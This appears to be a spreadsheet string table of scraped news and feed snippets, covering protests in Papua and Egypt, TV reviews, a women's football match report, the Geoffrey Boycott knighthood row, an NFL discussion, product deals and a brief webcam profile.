    <t>There are reports of gunfire and a building being set alight in chaotic protests in Indonesia's Papua.</t>
  </si>
  <si>
    <t>THERE’S always something new to do in the Far North when you’ve got a weekend free.</t>
  </si>
  <si>
    <t>duncanr</t>
  </si>
  <si>
    <t>for someone with no skill at – and an aversion to – DIY, I found this vid of a father and son building a small cabin from scratch oddly addictive viewing .</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/c3vHASyPYLQ/worst-current-tv-show-on-each-network-abc-fox-cbs-netflix-2018-3 The worst current TV show on each network, from Netflix to NBC to HBO We looked at the worst TV show currently on 17 networks, according to Rotten Tomatoes critic scores. They include Netflix’s “Insatiable” and NBC’s “New Amsterdam.” In today’s crowded TV landscape, networks and streaming services have all increased the quantity of their offerings — at times to the detriment of quality. To figure out which current shows are worth avoiding, we turned to the reviews aggregator Rotten Tomatoes to select the most critically loathed scripted show that each network and service is currently producing. We made some exceptions for shows that were canceled this year. We excluded children’s shows, talk shows, and docuseries, and we only selected from networks with multiple scripted shows that had enough reviews to receive a “Fresh” or “Rotten” designation. The critic score also had to be below 75%. Here is the worst current TV show on 17 networks, according to critics: John Lynch contributed to a previous version of this post. SEE ALSO: 8 movie sequels that have disastrously flopped at the box office this year ABC: “Splitting Up Together” Critic score: 38% Audience score: 88% Summary: “From executive producers Ellen DeGeneres, Emily Kapnek (Suburgatory), Jeff Kleeman (Little Big Shots) and Dean Holland (Parks and Recreation) comes Splitting Up Together, the story of Lena (Jenna Fischer, The Office) and Martin (Oliver Hudson, Scream Queens), whose marriage is reignited by their divorce.” What critics said: “They fell out of love, and the sitcom feels like a long, forced push to get them back together.” — Hal Boedeker, Orlanda Sentinel Amazon: “The Romanoffs” Critic score: 50% Audience score: 51% Summary: “From the creator of Mad Men, The Romanoffs is a contemporary anthology series set around the globe featuring eight separate stories about people who believe themselves to be descendants of the Russian royal family (Romanovs). Starring Aaron Eckhart, Diane Lane, Isabelle Huppert, Christina Hendricks, John Slattery, Amanda Peet, Jack Huston, Kathryn Hahn, Noah Wyle, Paul Reiser, Andrew Rannells and more.” What critics said: “Where the various descendants of the Romanovs have misplaced delusions of grandeur, so, too, does Weiner, who has instead birthed a too-long mess of incoherence and questions that I don’t care enough about to get answered.” — Kate Feldman, New York Daily News AMC: “The Son” Critic score: 52% Audience score: 84% Summary: “Based on Philipp Meyer’s New York Times best-selling and Pulitzer Prize finalist novel of the same name, season two of The Son concludes the journey of the iconic “First Son of Texas.” Eli McCullough’s (Pierce Brosnan) will stop at nothing to secure his legacy against the backdrop of the nascent oil industry of 1917. His tools are deceit, fraud and murder — weapons he wields with the effortless skill of the Comanche warrior he once was. But the biggest challenge he faces will be quelling a civil war under his own roof, triggered by his idealistic son Pete (Henry Garrett).” What critics said: “Like its characters, the show continuously puts its worst, least interesting foot forward, aristocratically expecting you’ll stick around to see the next step.” — Willa Paskin, Slate CBS: “Fam” Critic score: 40% Audience score: N/A Summary: “FAM stars Nina Dobrev and Tone Bell in a comedy about a woman whose vision of a perfect life with her adoring fiancé and his wonderful family is radically altered when her 16-year-old, out-of-control half-sister unexpectedly comes to live with her.” What critics said: “Fam boasts an almost outrageously good cast, one plugged into the most hollow and familiar of premises and then fed with a broad assortment of reheated multi-generational punchlines.” — Dan Fienberg, Hollywood Reporter CBS All Access: “Tell Me A Story” Critic score: 54% Audience score: N/A Summary: “Tell Me a Story takes the world’s most beloved fairy tales and reimagines them as a dark and twisted psychological thriller. Set in modern-day New York City, the first season of this serialized drama interweaves The Three Little Pigs, Little Red Riding Hood, and Hansel and Gretel into an epic and subversive tale of love, loss, greed, revenge, and murder.” What critics said: “To fill its empty soul, Tell Me a Story tries to capitalize off of time-honored fairy tales and timely anger surrounding Trump. And that, my friends, is a horror story made for no time whatsoever.” — Ben Travers, Indiewire The CW: “Roswell, New Mexico” Critic score: 53% Audience score: 61% Summary: “After reluctantly returning to her tourist-trap hometown of Roswell, New Mexico, the daughter of undocumented immigrants discovers a shocking truth about her teenage crush who is now a police officer: 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 What critics said: “Besides just the general problem with this kind of love story, Max’s obsession with Liz just isn’t as cute at nearly-30-years-old as it is in teen form.” — LaToya Ferguson, Uproxx Fox: “Proven Innocent” Critic score: 25% Audience score: 54% Summary: “Emmy and Golden Globe Award winner Danny Strong (EMPIRE) partners with David Elliot (“Four Brothers”) to tell the emotional story of one woman’s fight for the innocence of others, as well as her own.” What critics said: “It’s guilty of way too many TV sins.” — Brian Tallerico, RogerEbert.com FX: “Mayans M.C.” Critic score: 72% Audience score: 75% Summary: “Mayans M.C. is the next chapter in Kurt Sutter’s award-winning Sons of Anarchy saga. Set in a post-Jax Teller world, Ezekiel “EZ” Reyes (JD Pardo) is fresh out of prison and a prospect in the Mayans M.C. charter on the Cali/Mexi border. Now, EZ must carve out his new identity in a town where he was once the golden boy with the American Dream in his grasp. “ What critics said: “Already been here, done this. I am exhausted.” — Verne Gay, Newsday HBO: “Ballers” Critic score: 72% Audience score: 79% Summary: “Success hits hard. Dwayne ‘The Rock’ Johnson stars in this series as a retired football superstar trying to reinvent himself as a financial manager for current players in sun-soaked Miami.” What critics said: “This is not the stuff of great comedy. It’s barely the stuff of interesting TV.” — Christopher Lawrence, Las Vegas Review-Journal Hulu: “Into the Dark” Critic score: 73% Audience score: 69% Summary: “In partnership with Blumhouse Television, Into The Dark is a horror event series from prolific, award-winning producer, Jason Blum’s independent TV studio. The series includes 12 super-sized episodes, with a new installment released each month inspired by a holiday and will feature Blumhouse’s signature genre/thriller spin on the story.” What critics said: “If only this horror anthology was more, well, horrifying. As is, Into the Dark is more chill than chilling.” — Lorraine Ali, Los Angeles Times NBC: “New Amsterdam” Critic score: 34% Audience score: 82% Summary: “Inspired by the oldest public hospital in America, this unique medical drama follows the brilliant and charming Dr. Max Goodwin, the institution’s newest medical director, who sets out to tear up the bureaucracy and provide exceptional care. How can he help? Well, the doctors and staff have heard this before. Not taking “no” for an answer, Dr. Goodwin must disrupt the status quo and prove he will stop at nothing to breathe new life into this understaffed, underfunded and underappreciated hospital – the only one in the world capable of treating Ebola patients, prisoners from Rikers and the president of the United States under one roof – and return it to the glory that put it on the map.” What critics said: “Addressing medicine’s many ills requires acknowledging their complexity; New Amsterdam does the opposite, leaving only frustration and fear in its wake. For a show about healing the system, it may do real harm.” — Brit Trogen, The Atlantic Netflix: “Insatiable” Critic score: 12% Audience score: 84% Summary: “A bullied teenager turns to beauty pageants as a way to exact her revenge, with the help of a disgraced coach who soon realizes he’s in over his head.” What critics said: “While Insatiable would like you to excuse its considerable meanness as satire or even good-doing, the truth is that it’s often tooth-tinglingly saccharine.” — Linda Holmes, NPR Showtime: “Black Monday” Critic score: 55% Audience score: 84% Summary: “Travel back to October 19, 1987—aka Black Monday, the worst stock market crash in the history of Wall Street. To this day, no one knows who caused it … until now. This is the story of how a group of outsiders took on the blue-blood, old-boys club of Wall Street and ended up crashing the world’s largest financial system, a Lamborghini limousine and the glass ceiling. The outrageous comedy series stars Don Cheadle, Andrew Rannells and Regina Hall.” What critics said: “It lacks any compelling through-line as a drama or a comedy, which is not even to mention how this intellectual vacuum renders those pesky non-PC jokes pretty unfunny.” — Bridget Read, Vogue Syfy: “Deadly Class” Critic score: 64% Audience score: 92% Summary: ” Deadly Class follows a disillusioned teen recruited into a storied academy for assassins. Maintaining his moral code while navigating a ruthless curriculum, vicious social cliques, and his own adolescent uncertainties may prove fatal. Set against the backdrop of late 80s counter culture, Deadly Class is a coming of age story unlike anything you’ve ever seen. Based on the smash hit comic series of the same name by Rick Remender.” What critics said: “Deadly Class asks what it takes to change the status quo, but its answer so far is not particularly revolutionary.” — Allison Keene, Collider TBS: “The Guest Book” Critic score: 64% Audience score: 83% Summary: “For a tiny cottage in a tiny town, this place sure is going to see a lot of baggage. Each episode, new guests will bring their special brand of crazy to this new comedy from “My Name Is Earl” creator Greg Garcia.” What critics said: “For a show about the hospitality industry, The Guest Book is remarkably ungenerous, and wastes a cast that includes fine actors like Danny Pudi, Stockard Channing, Aloma Wright, and Garret Dillahunt.” — Maureen Ryan, Variety TNT: “The Alienist” Critic score: 64% Audience score: 78% Summary: “The Alienist is a psychological thriller set in 1896 about the hunt for a serial killer responsible for the gruesome murders of boy prostitutes that have gripped New York City. Based on the novel by Caleb Carr.” What critics said: “The Alienist spends more time telling you what’s going on beneath the surface than allowing for any real depth to emerge.” — Allison Shoemaker, RogerEbert.com USA: “The Purge” Critic score: 41% Audience score: 65% Summary: “During a 12-hour period when all crime — including murder — is legal, a group of seemingly unrelated characters cross paths in a city in an altered America. While the clock winds down, some will fight, some will hide, others will embrace what it means to Purge to its fullest extent — whether for revenge, personal gain, protection, or unadulterated glee. As each character is forced to reckon with his or her past and plot how to better their futures, they soon discover how far they will go on Purge Night.” What critics said: “In the first three episodes, following the dictates of basic cable, it dials back both the social commentary and the splatter-happy action and violence from their cinematic levels.” — Mike Hale, New York Times Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/c3vHASyPYLQ/worst-current-tv-show-on-each-network-abc-fox-cbs-netflix-2018-3 The post The worst current TV show on each network, from Netflix to NBC to HBO appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Italian-German miniseries The Name of the Rose has its premiere on SBS next week. Based on the novel by Umberto Eco it stars John Turturro and Rupert Everett. This is an 8 part series which premiered internationally in March and begins with a double episode. In 1327, a brilliant English Franciscan friar, William of Baskerville, is sent by the Holy Roman Emperor to an isolated abbey in the North of Italy for a dramatic, pivotal summit. There is a war between the Emperor and the Pope that reflects the fierce ideological war inside the Christian religion – does the Church need to be poor, imitating the life of Christ or does it need riches and power in order to reign over the western world? William is accompanied by a passionate and noble adolescent Adso, who aspires to become a monk while his family wants him to be a warrior. As soon as the two arrive at the abbey, they enter a frightful, unexpected world. Series One, Episode One: Adso, a young soldier and son of a German general befriends William of Baskerville, a learned and intelligent English Franciscan friar. The two journey to a remote monastery where an important conference will be held between the Pope’s delegation and that of the Emperor. They arrive just as the body of one of the monks is found – initially dismissed as a suicide, suspicions arise when a second body is discovered shortly after. Episode Two: With the Pope’s delegation on their way to the Abbey, William and Adso investigate the mysterious deaths and conclude they are the work of a serial killer. They find a trail that leads straight to the infamous library and devise a plan to break in to the labyrinth. 8:35pm Thursday October 3 on SBS.</t>
  </si>
  <si>
    <t>Hibernian 3 (Napier 9, Boyle 15, Cornet 46) Celtic 0 Following a 3-0 defeat away to Hibernian, Celtic are still in joint second place with the Edinburgh side, but have played a game more than the team from the capital. Report / Image: Celtic FC Celtic were up against it early on as Jamie Lee Napier and Rachael Boyle scored within the opening 15 minutes, before a cruel deflection inside the first minute of the second half sealed the win for the Edinburgh side. In the opening stages, the keepers saw a lot of the ball as both sides fought to get a grip of the game. Celtic’s best early chance came in the third minute as Keeva Keenan found Kathleen McGovern in the middle, whose great first touch awarded her time to release Rachel Donaldson out wide, but the ball back in eventually came to nothing. In the ninth minute though, Napier picked up Boyle’s through ball in a pocket of space behind the Celtic defence, to break into the box and slot past Chloe Logan in goal. Shortly after Hibs’ opener, the Celts were unfortunate not to take it to level terms when Sarah Ewens linked up well with McGovern to force a corner. Josephine Giard’s initial shot was blocked by Chelsea Cornet, before Rachael O’Neill’s effort landed on the top of the net with 12 minutes on the clock. However, by the quarter-hour mark, Hibs had a two goal cushion over the Hoops. Shannon Leishman won the ball in the middle of the park to pick out Napier again in space down the right, who turned provider to cross in for Boyle for the volley. Celtic weren’t without their chances, though, with Danielle Cox heading a Keenan free-kick wide, Ewens calling Jenna Fife into action with a stinging shot from distance and Chloe Craig delivering a free-kick into the area all within the first half-hour. With four minutes left until the break, Giard did well to round Fife, but was brought down in a tangle of Hibs bodies before the danger was cleared and play continued, despite the attacker’s protests. The Hoops were dealt a hammer blow in the opening minute of the second half. Leishman and Cornet combined down their left-hand side before the final shot deflected in off Kelsey Hodges, leaving the Celts with a real uphill battle to turn around. With 15 minutes left, substitutes Emma Craig and Kodie Hay both did well on Celtic’s right with Craig battling well to cut in at the byline and Hay crossing in, but neither crosses were converted. With time running out, Craig sent another deep cross in, this time for Donaldson, but her powerful effort was met by a good stretching save from Fife, meaning Celtic would leave the capital empty handed. With five games of the season left, the race for second place heats up even further. Celtic play Spartans on Sunday September 29 at Ainslie Park, Edinburgh. Celtic: Logan, Keenan, Ross (E Craig), C Craig, Giard, Ewens, Donaldson, Clark (Smart), Cox, O’Neill (Hodges), McGovern (Hay) Subs: Cunningham, McLaughlin https://celticfcwomen.celticfc.net The post #SBSSWPL1: Hibernian LFC v Celtic FC | Scottish Women’s Football appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Take a look at the high tech helmet that the Australian next-gen soldier might be wearing by 2035.</t>
  </si>
  <si>
    <t>Japan’s shinkansen rail system is the envy of the world. American Rail Club takes a ride from Tokyo to Osaka to find out why! ▶Brightline now Virgin Trains USA! ▶SHIRTS ON HOLIDAY SALE – LAST CHANCE! ▶Don’t forget to subscribe to the future! www.americanrailclub.com ▶SUPPORT US ON PATREON: ▶JOIN US ON FACEBOOK: ▶FOLLOW US ON […] The post BULLET TRAIN – Riding Japan's Super Shinkansen – 新幹線に乗りましょ！ appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>anujd24</t>
  </si>
  <si>
    <t>Exclusive for OZBARGIN customers. Save $300 on Selective HP Refurbished Laptops (CODE HP300). Hurry! Offers end at midnight on Friday, Sep 20 Midnight. Minimum purchase Price of product $699. Free Standard Shipping across Australia. Free 90 Days Renewd Warranty One Year Warranty was $89 now only $69 Cannot be used in conjunction with other offers. Use the link above and discount will be automatically applied at checkout or use Coupon Code HP300 at the checkout page. What does Renewd Certified refurbished mean ? Each Renewd Certified Refurbished Product: Undergoes full functionality testing and any defective modules identified in testing are replaced. Is put through a thorough cleaning process and inspection. Is repackaged in plain packaging Includes either the Operating System originally shipped with the unit Is placed into a Final QA inspection prior to being added to sellable refurbished stock. Refurbishment procedures follow the same basic technical guidelines as the manufacturers Finished Goods testing procedures. Images are for reference only, they are not of the actual product. AC Adapter and power cord are included for all products.HP300 Cannot be used in conjunction with any other offer running on the website. Offer valid till stock last.</t>
  </si>
  <si>
    <t>janettefuller posted a photo: This card features the digital stamp "Bee Mine" from Mo’s Digital</t>
  </si>
  <si>
    <t>My Kinks: I love to play in front of the cam and I love to e Webcam profile: Hello guys please allow me to quickly share a bit about myself. I am open minded and very charming, a woman with a sense of humor, ready to spend a great time with you! Favourite sex position: Hello guys please allow me to quickly share a bit about myself. I am open minded and very charming, a woman with a sense of humor, ready to spend a great time with you! What I do in my amateur show: Deep and passionate love, yeah you might get hurt but it is the only way to live the life fully What I don’t like: Rude and inconsiderate men. People pretending to be something they are not Gallery</t>
  </si>
  <si>
    <t>Kemosabe</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</si>
  <si>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La religión es cosa de viejos: los jóvenes de todo el mundo cada vez se desenganchan más de ella by USA Consumer Credit Counseling, Felipe Escobar on Wednesday 04 September 2019 06:26 AM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La religión es cosa de viejos: los jóvenes de todo el mundo cada vez se desenganchan más de ella Wednesday 04 September 2019 05:58 AM UTC-05 | Tags: consumer-credit-counseling-service https://firmadeabogadosmedellin.blogspot.com/p/camden-new-jersey-consumer-credit.html Pese al sinfín de elementos culturales, demográficos, sociales y económicos que les separan, los jóvenes de todo el planeta parecen tener algo en común: están dejando de lado a la religión. Una encuesta reciente de Pew confirma que, en agregado y… Tags: El Monte, California Consumer Credit Counseling Service | (888) 551-1270 via La religión es cosa de viejos: los jóvenes de todo el mundo cada vez se desenganchan más de ella September 04, 2019 at 05:52AM Copyright © September 04, 2019 at 05:52AM Tags: consumer-credit-counseling-service</t>
  </si>
  <si>
    <t>Brisbane have refuted a claim that Darius Boyd will step down from the captaincy after their humiliating NRL finals exit.</t>
  </si>
  <si>
    <t>WIN a pair of tickets to see Hormonal Housewives. Original Source … show blasted its way through a catalogue of popular women's themes – weight gain, weight loss, mood swings, housework, homework, electrolysis,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WIN a pair of tickets to see Hormonal Housewives. appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Albert Evans</t>
  </si>
  <si>
    <t>Sir Geoffrey Boycott said he does not “give a toss” about criticism of him receiving a knighthood despite having a conviction for assaulting his former partner in 1998. Speaking on the BBC Radio 4 Today Programme on Tuesday, the former cricketer hit back at criticism of his inclusion in Theresa May’s honours list, arguing that it was “25-years ago.” Domestic abuse charities have criticised the former Prime Minister over the decision to give the former England cricket star a knighthood, after he was convicted in France in 1998 of beating his then girlfriend Margaret Moore in a French Riviera hotel. ‘I don’t give a toss about her, love’ Responding to comments from the co-acting chief executive of Women’s Aid, who said his award was “very disappointing,” Sir Geoffrey said: “I don’t give a toss about her, love. “Twenty-five years ago. You can take your political nature and do whatever you want with it. I couldn’t give a toss.” Read more: Theresa May’s honours list in full Adina Claire, of Women’s Aid, said: “Celebrating a man who was convicted for assaulting his partner sends a dangerous message – that domestic abuse is not taken seriously as a crime. “With increasing awareness of domestic abuse, and a Domestic Abuse Bill ready to be taken forward by Government, it is extremely disappointing that a knighthood has been recommended for Geoffrey Boycott, who is a convicted perpetrator of domestic abuse.” Mrs May, who introduced a landmark Domestic Abuse Bill to Parliament earlier this year, gave Boycott a knighthood for services to sport in her resignation honours list. ‘It’s disappointing’ Brearley discusses the game with former England opening batsman Geoffrey Boycott (Getty Images) Boycott, who has always denied the assault, was fined £5,000 and given a three-month suspended prison sentence over the attack. Computer consultant Mrs Moore suffered bruising to her forehead and blackened eyes in the assault at the Hotel du Cap in Antibes in October 1996. Boycott has accused her of putting a “stain on my name” and maintained her injuries were sustained through an accidental slip and fall. But public prosecutor Jean-Yves Duval rejected Boycott’s claims, saying the injuries were “absolutely incompatible” with an accident and that the cricketer’s lawyer Jean-Luc Cardona did not stand up to examination. A spokeswoman from the Woman’s Trust said: “It’s disappointing to see Geoffrey Boycott included in Theresa May’s honours list, given her vocal support for domestic abuse survivors and the Domestic Abuse Bill. “While we welcome the recent Domestic Abuse Bill for its work to widen the definition of domestic abuse, the inclusion of Geoffrey Boycott in the honours list shows just how much our attitude as a society needs to change when it comes to supporting survivors.” ‘Most people in England believe it’s not true’ Former prime minister Theresa May gave honours to her key aides (Photo: Getty) Mr Boycott said his experiences in the French courts were one of the reasons he has been a passionate advocate for Brexit. He said: “It was a court case in France where you’re guilty, which is one reason I don’t vote to Remain in Europe. You’re guilty until you’re proved innocent. “It’s the totally opposite of when you’re in England, and it’s very difficult to prove you’re innocent in another country in another language. “And most people in England don’t believe it, I didn’t do it, you move on. It’s a cross I have to bear, right or wrong, good or bad, I have to live with it. “I’m clearing my mind and I believe most people in England believe it’s not true.” Additional reporting by the Press Association. More on the honours list Theresa May's resignation honours list in full Geoffrey Boycott knighted despite domestic abuse conviction Here's the full Queen's birthday honours list for 2019 Frank Field calls for Sir Philip Green to be stripped of knighthood New Year Honours 2019 – list in full: everybody recognised this year Father honoured for knife crime charity set up after son was killed The post Geoffrey Boycott says he ‘doesn’t give a toss’ about criticism of his knighthood due to domestic violence conviction appeared first on inews.co.uk. The post Geoffrey Boycott says he ‘doesn’t give a toss’ about criticism of his knighthood due to domestic violence conviction appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Depriving children of the technology of their era is damaging their faith in adults, while there is no evidence it will improve their education.</t>
  </si>
  <si>
    <t>ANN WIDDECOMBE has launched a scathing attack on the “ghastly and undemocratic” European Union as she opened up about day to day life as Brexit Party MEP. Daily Express :: News Feed</t>
  </si>
  <si>
    <t>IT CHAPTER TWO: The Vaults Experience is taking place in London this week, but can you still get tickets? Daily Express :: Films Feed</t>
  </si>
  <si>
    <t>Thousands of protesters have rallied across Egypt demanding the resignation of the country's President Abdel Fattah el-Sisi. The rallies are in response to corruption allegations against President Sisi's government, after an online call to a dissent from a prominent Egyptian actor. The president has dismissed the corruption claims as "lies and slander". President Sisi has ruled Egypt since 2013 - after leading the military coup against the country's first democratically elected president, Mohammad Morsi. Image: AP</t>
  </si>
  <si>
    <t>Deputy head of retail banking arm will also be first woman to lead one of UK’s big four banksLatest business news – live updatesAlison Rose will be the first woman to lead one of Britain’s biggest banks after Royal Bank of Scotland named her as its new chief executive.RBS ended months of speculation when it confirmed Rose, the favourite for the job, will take over from Ross McEwan on 1 November. Continue reading… Read More</t>
  </si>
  <si>
    <t>The Biggest Surprises From Week 1 Of The NFL Season Original Source sara.ziegler (Sara Ziegler, sports editor): It‘s been quite an opening week in the NFL — and that’s just on the field. We started with an old-fashioned defensive slugfest on Thursday and ended Sunday night with the Patriots still looking like the Patriots. And we still have two games left tonight! Throw in a tie for good measure, and the season is off and running. There was a lot to unpack in Week 1. What were your biggest surprises of the week? Salfino (Michael Salfino, FiveThirtyEight contributor): I think the Browns are the biggest surprise of Week 1. Not just Baker Mayfield and the offense — because maybe the Titans have a good defense. Who knows at this stage of the season? But the Cleveland defense, which seemed like it was perfectly designed to dominate in the trenches and on the perimeter with the corners, was just shredded. Marcus Mariota had 10.3 yards per attempt, admittedly inflated by a screen pass to Derrick Henry. And the Titans ran the ball well. So it was just a total team collapse by the Browns. sara.ziegler: I do feel like Cleveland was classically set up for this disappointment. Our model didn’t think the Browns would be nearly as good as everyone else seemed to think they would be. neil (Neil Paine, senior sportswriter): Yes, we had warned Cleveland fans to kind of pump the brakes before the season. This was a good-looking team by Browns standards, but that’s different from being a good-looking team, period. Salfino: I know this is a little Narrative Street, but the Browns really set themselves up to be the hunted and not the hunters with all the offseason talk. I don’t know if there’s ever been a team coming off a losing season that had every opponent circling their game on the schedule. Maybe now they will just shut up and play because obviously there is a lot of talent there. Maybe the humiliation on Sunday in Cleveland will actually be good for them, since they needed humbling. neil: For me, the biggest surprise was Lamar Jackson. He was one of the worst QBs in the league as a rookie last season, and the Ravens adapted their offense to be incredibly run-heavy (particularly by 2018 standards) because he was such a better runner than passer. So to see him come out and throw for 324 yards on 17-for-20 passing, 5 TDs, 0 picks and a perfect 158.3 passer rating was nothing short of astonishing. You could have told me a QB would do that Week 1, and I would have guessed 25 QBs before Jackson. Salfino: The tricky thing with this game is whether the Dolphins are the 1962 Mets — or did the Ravens make them look that way? Let’s put it this way: If the Dolphins are trying to lose, they couldn’t have done it any better. neil: That’s a great point to keep in mind. The Dolphins have been accused of tanking all offseason, and they played like it Sunday. Incidentally, what’s the opening line on Pats-Dolphins next week? I shudder to think. Salfino: New England minus-14.5 at Miami, up to 17 now. That would put them among the biggest home underdogs since 1970. sara.ziegler: And now Miami players are reportedly asking their agents to get them off the team! Not great. neil: What was your biggest surprise, Sara? sara.ziegler: Arizona! Loved to see the fight from Kyler Murray and Co. neil: Fighting back for a TIE, no less. sara.ziegler: So great. neil: That’s just fighting back for the love of the game, not the glory. Lol. Salfino: Murray was Tebowing on Sunday: horrible for most of the game and then turned it on in the fourth quarter. I guess the slow start was opening day jitters. Maybe it was a mistake to not use the regular offense in the preseason. sara.ziegler: That’s a great point, Mike. So many of these offenses have looked SOOOOO bad. Maybe a few more reps in the preseason could help? neil: Maybe this is the year the “rest the starters all preseason” trend jumps the shark. Salfino: Start with Mitch Trubisky and the Bears. sara.ziegler: And Aaron Rodgers and the Packers! neil: That game was SO ugly. sara.ziegler: It kinda hurt to watch. neil: Although if they were going for symbolism with the NFL of 100 years ago, they kinda got what they were asking for. Salfino: Bears-Packers set back offensive football 100 years, so…. sara.ziegler: So true. Salfino: I just am skeptical about changing the offensive system of an inner-circle Hall of Fame player — especially someone as generally grumpy as Rodgers — with that young of a coach who has not proven anything. How does this work? I would have given Rodgers Mike Shanahan — someone he had to respect — if you want to switch to a Mike Shanahan offense. sara.ziegler: Our colleague Josh Hermsmeyer wrote about the Packer play-calling that might have been holding Rodgers back last year … but I’m skeptical, too, about changing that on a dime. Salfino: And it’s kind of like, “Mike Shanahan is standing right here.” But the league is all about young coaches now. Does this work with a 35-year-old QB though? Will the QB, especially this QB, buy in? sara.ziegler: Hahaha neil: But at least there, you can use the coaching change as an excuse. Maybe they’ll find more of a rhythm as the season goes on. There were no such excuses for Trubisky’s poor performance. Salfino: For Trubisky, we kind of know what he is, right? His ability to execute plays that work as designed is definitely below the line. He sort of has to play with his hair on fire, out of structure, so he’s a tough player to design an offense for. Based on one game, I’d set the Browns over/under at nine wins, the Ravens at 10 and the Cardinals at six. (I mean, it was Matt Patricia blowing a game, right?) sara.ziegler: Haha What’s the over/under at Patricia still being the coach in January? neil: That’s the REAL over/under to worry about. Salfino: I think Patricia has to be a favorite to be fired in-season. The Dolphins aren’t going to fire a coach. It has to be a team that thinks they’re good with a “franchise” QB, I assume. neil: The funny thing is, Matt Stafford actually played well overall, with a 110.0 passer rating. But the defense badly collapsed down the stretch. sara.ziegler: Who else stood out? Philadelphia? Kansas City? Salfino: I wrote about the impact a downfield weapon has on the entire offense, regarding DeSean Jackson. That certainly was a factor in Sunday’s Eagles win, though Jackson did most of the damage himself. But now the best of these players for Kansas City, Tyreek Hill, is probably out a significant amount of time with a shoulder injury, and I wonder if this will slow down the Chiefs offense. Sammy Watkins was unreal on Sunday, but he did a lot of that damage with Hill in the game. Does the Chiefs offense seem more mortal now? neil: Not to mention that Pat Mahomes was hobbling around on a bum ankle. Salfino: And he no-looked away a TD to a wide-open Travis Kelce like he was Meadowlark Lemon. neil: If Mahomes shakes off any effects of that ankle — and it’s not supposed to be serious — they still have a lot of weapons even without Hill. But they were a team everyone was already wondering about perhaps regressing offensively, just because the highest-scoring offenses usually tend to fall off some in the following season. sara.ziegler: LeSean McCoy looked decent as one of those weapons. Salfino: They do seem to have an endless supply of super-athletic players, but Hill really dictates coverage and makes defenses more easy to dissect. The McCoy thing is interesting — Damien Williams still had 65 percent of snaps, compared to just 30 percent for McCoy. But how does Andy Reid tell a guy like McCoy — with over 14,000 scrimmage yards who just outplayed Williams — that he’s sitting behind Williams? I have to think McCoy is the primary back near term for the Chiefs — and he may be washed up, I know. Speaking of running backs, not a good day for Melvin Gordon. sara.ziegler: Salfino: You want to say that RBs are fungible, but Austin Ekeler is not just an ordinary backup. He’s electric. I think him leading a committee is perfect, and the Chargers are now 5-0 since 2018 without Gordon in the regular season. sara.ziegler: Not gonna lie: I forgot for a second about the Gordon holdout. The Antonio Brown drama just eclipsed everything. neil: Austin Ekeler:Melvin Gordon::James Conner:Le’Veon Bell ? (I think I got my SAT analogy format right there?) sara.ziegler: Very nice, LOL Salfino: Well, the Steelers looked like they missed Bell and Brown on Sunday night. neil: Steelers looked like they missed a lot of things Sunday night. Salfino: I think the story with the Steelers is that Juju Smith-Schuster is not a downfield wide receiver, and they have no one who can threaten defenses deep like Brown could (even though he was used all over the field). So the Steelers offense looked suffocated on Sunday. There was just no room to breathe. Ironically, the team on the field that really needs Brown was the Steelers. sara.ziegler: It was hard to watch that game and not think, “Oh, the Patriots are unstoppable again.” Salfino: But why even add Brown? I guess it makes sense if you are worried about Josh Gordon’s status, given that he has not completed an NFL season since 2013. But if you know you have Gordon — which of course you can never know — Brown is another mouth to feed and obviously a volatile personality on a team that does not remotely need his talent. Put it this way, if the Patriots had not signed Brown, the story off that game would be, “Of course they shouldn’t have signed Brown because they are a finely tuned machine right now, so why mess with that?” neil: That’s true. It sort of adds diminishing returns on the field and the potential for chaos off the field. But maybe they wanted extra insurance for Tom Brady at receiver with Gronk retired. Salfino: Brady is 42. He threw the ball very well, especially deep. But the expectation with an older player is that he will fade as the season progresses. It’s really the Patriots and Brady vs. Father Time. That’s the Battle of the Ages, not New England vs. the NFL. sara.ziegler: I just assume it’s part of the overall Evil Plan that Patriots always execute to perfection. neil: I will say this. I have compared Brady’s downfall (whenever it happens) to Peyton Manning’s in 2015, in the sense that when it does happen, it will probably happen very quickly. But for whatever one game is worth, Manning already showed signs of what was to come with a terrible opener that year against Baltimore. Brady, on the other hand, was perfectly fine. So if you’re mentally tracking the odds of a Brady collapse in 2019, those odds had to go down quite a bit just after a game. Salfino: But what about Peyton in 2014? Isn’t that the example that the Patriots (and Saints) have to fear? That did come all at once. And we ignored it heading into 2015, mostly, attributing it to nagging injuries, which probably was the point. Peyton started 2014 with 22 TDs and three picks in seven games. neil: True, while Brady was not great in the Super Bowl and had a mediocre game or two down the stretch, he wasn’t consistently struggling late in 2018 as much as Peyton did in 2014. So maybe that does mean the writing was more on the wall for him than Brady, anyway. Whatever happens, I love Week 1 because we’re all so eager to overreact to every little thing that happens once real football starts. So I wonder which things that seem clear right now will end up looking foolish in a couple months. sara.ziegler: Can’t wait to find out! Check out our latest NFL predictions.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The Biggest Surprises From Week 1 Of The NFL Season appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Stephen Curry’s new signature “Range Unlimited” golf fashion line just dropped a few days back, and some of the items in the 14-piece fall collection of caps-on-down-to-kicks are already listed as sold out on Under Armor’s website. Source: Sports Business News</t>
  </si>
  <si>
    <t>News Corp is standing by its report which suggested Carrie Bickmore and Karl Stefanovic were under consideration for the Today show. Nine’s news boss Darren Wick issued a statement on the weekend claiming the article was “made-up.” “Nine has not approached, and does not intend to approach, Carrie Bickmore or her representatives about joining Nine as a host of the Today Show, nor in any other role,” he said. “Carrie is an outstanding broadcaster and an inspirational person. She’s terrific. But she does not factor in our plans for the future.” But News Corp has further responded today with a spokesperson saying, “As many people in the media know, approaches to talent are often made in ways that can be plausibly denied. “The Sunday Telegraph stands by its report that an approach to Carrie Bickmore was made.” Nine’s statement made no comment on the suggestion of Karl Stefanovic rejoining the show, which has been speculative chatter for some time. Nine declined to add further comment today.</t>
  </si>
  <si>
    <t>Tankovic</t>
  </si>
  <si>
